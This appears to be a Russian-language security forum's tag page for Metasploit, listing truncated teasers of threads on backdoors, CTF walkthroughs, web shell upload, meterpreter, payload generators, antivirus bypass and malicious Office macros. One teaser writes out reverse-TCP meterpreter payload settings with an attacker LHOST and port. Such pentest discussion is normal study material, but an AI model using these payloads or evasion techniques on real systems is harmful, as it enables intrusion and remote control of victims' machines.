metasploit

  1. V

    Интересует создание бекдоров для теста своей локальной сети

    Доброго времени суток Поделитесь пожалуйста опытом или ссылками на metasploit framework, конкретнее интересует создание бекдоров, для теста своей локальной сети, возможно ли при помощи метасплоита обойти DFL 860 E, и через nmap забросить подобный файл на один из серверов, или все попытки...
  2. Vander

    CTF CTF. Hack the Billy Madison VM Part 2

    Продолжаем разбираться с Billy Madison VM. Закончили мы на том, что получили логин и пароль второго пользователя на FTP. > https://codeby.net/threads/ctf-hack-the-billy-madison-vm-part-1.59147/ Логинимся под ними на FTP и забираем два интересующих нас файла: > get eg-01.cap > get...
  3. Vander

    Статья Загрузка shell в WEB-сервер. PhpMyAdmin

    Приветствую! В этой статье рассмотрим способ загрузки shell на целевой веб-сервер, при условии, что у нас есть доступ к phpmyadmin панели. В качестве платформы для тестов, возьмем XAMPP, о нем я уже писал в этой статье => https://codeby.net/threads/xampp-web-server.59098/ Для начала необходимо...
  4. Pushkinmazila

    Решено Статический IP

    И так народ предположим что мы можем запустить полезную нагрузку у цели НО нам нужно иметь доступ к этой сессии (meterpreter) из любой точки К примеру подрубились мы к сети жертвы, загрузили , но у здания сидеть на морозе не комельфо по этому пойдем в местный мак... (уж больно пирожок с...
  5. Pushkinmazila

    Статья Основы работы в meterpreter (Metasploit Часть1)

    «Чтобы двигаться в будущее нужно вернуться в прошлое» В этой статье мы вновь вернемся назад и узнаем об основах работы в meterpreter, ибо очень много информации есть как получить сессию, а вот что дальше делать с этим инфы мало) Вот сейчас мы пройдемся с начала по Скриптам а потом и до Команд...
  6. Vander

    SMB Pentest Windows Server 2008

    Всем привет! В этой статье я опишу процедуру тестирования на проникновение целевого хоста под управлением Windows Server 2008. Целью будет получение активной сессии meterpreter, на компьютере тестирующего. В качестве платформы для проведения теста, мною будет использоваться Kali Linux...
  7. П

    Проблема Что с метасплоитом в Кали?

    Возникла проблема с метасплоитом. ставишь с нуля Кали2 ,последняя версия с сайта . Запускаю консоль метасплоита и ничего нельзя сделать . то есть , есть конкретный эксплоит , ms15_078_atmfd_bof.rb , при команде use exploit/windows/local/ms15_078_atmfd_bof.rb пишет failed ti load module ...
  8. komodikus

    Metasploit joomla bruteforce

    Добрый день. Есть ли у когонибудь примеры брута жумлы метасплоитом? Есть вопрос - не совсем ясно в чем отличие AUTH_URI от FORM_URI. Возможно из-за моего неверного заполнения данных форм он не может валидный пароль подобрать. Если кто знает, подскажите какие у меня ошибки
  9. PeaceMaker

    Решено Неудачная атака. Windows XP, 135 порт.

    Уважаемые гуру, видимо, ввиду отсутствия опыта и достаточного количества знаний я зашёл в тупик. Прошу совет - что я делаю не так? Итак: захожу в локальную сеть по WI-FI, сканирую диапазон и вижу довольно редкую в наше время машину Win XP с открытым 135 портом. Запускаю metasploit...
  10. <~DarkNode~>

    Статья [SharpMeter] - Генератор полезных нагрузок C-sharp

    И снова здравствуйте друзья) Коротенький пост,посмотрим сегодня функционал программы SharpMeter которая позволяет нам создавать полезные нагрузки на языке C#. Написанная на питоне. Все тривиально просто. И так качнули с гитхаба. Запустили на виндоус машине,смотрим справку: Поддерживает наш...
  11. SooLFaa

    Статья AV ByPass с помощью C#

    Привет. Господа хекеры. Рассмотрим вариант байпасса антивирусов с помощью языка C#. Обо всё предлагаю по порядку и для начала сгенерируем полезную нагрузку в метасплоите. use windows/meterpreter/reverse_tcp Устанавливаем опции set LHOST 192.168.1.237 set LPORT 1338 set EXITFUNC thread И...
  12. Vander

    Статья Генерация полезных нагрузок (Payload)

    Привет, в этой статье я продолжу освещать тему полезных нагрузок (Payloads) и их применение. В первой части мы ознакомились с типами Payloads, в этой разберемся с их созданием. В качестве примера будем использовать Metasploit Framework и Kali Linux в качестве ОС. В Metasploit мы можем, создать...
  13. The Codeby

    Soft Обзор свойств Metasploit Community

    Перевод: Анна Давыдова Источник: rapid7.com Вернуться к оглавлению Metasploit Community – руководство пользователя Этот раздел охватывает следующие темы: Обзор свойств Панель инструментов Навигационный обзор Административный обзор Обзор свойств Обзор свойств Metasploit Community Metasploit...
  14. The Codeby

    Статья Обзор Metasploit Community

    Вернуться к оглавлению Metasploit Community – руководство пользователя Этот раздел охватывает следующие темы: Обзор продукта Компоненты Metasploit Community Службы Listener Реализация Metasploit Общая терминология Metasploit Рабочий процесс Metasploit Поддерживаемые браузеры Поддержка...
  15. Vander

    Windows Exploit Suggester

    Всем привет! В этой небольшой статье, я хочу обратить Ваше внимание на аудит системы перед тестированием ее на проникновение. Таких методов масса, но попавшийся мне, довольно интересный. Он производит анализ информации о системе и сопоставление его, с базой данных эксплойтов, в конце работы...
  16. M

    [MSF] В чем отличие bind и reverse PAYLOAD?

    Когда какой лучше использовать?
  17. K

    Статья Hack windows 7/8/10 с помощью venom - shellcode generator (.msi .hta .vbs .ps1 .dll .php .jar .pdf)

    Салам! Сегодня поговорим о venom - shellcode generator' е, а точнее об dll-injection (winrar/sfx compressed + fast_migrate.rc) Для теста нам понадобится Kali Linux и любая виндовс машина. Для начала нам нужно скачать сам генератор link removed, идем в директорию...
  18. Vander

    CTF CTF. Hack the Sick OS 1.1

    Всем привет. В этой публикации я продемонстрирую взлом уязвимой машины Sick OS (ссылка на скачивание в конце) статьи в рамках соревнований CTF, кто не в курсе, о чем речь - https://codeby.net/threads/ctf-vzlom-mr-robot-vm.57930/ тут подробное описание. От себя хочу добавить, что это ОС довольно...
  19. Vander

    Penetration Testing with Microsoft Office

    Всем привет! В этой статье я покажу, как можно получить доступ к удаленному компьютеру, используя Veil Evasion и Microsoft Excel. А точнее одно свойство Excel – поддержка макросов. Макрос - это программа, которая содержит набор инструкций выполняющих какие либо действия, как автоматически, так...
  20. z3RoTooL

    search_email_collector

    Всем привет! Хочу показать способ поиска адресов средствами Metasploit. Писать ничего не буду - просто выложу видео.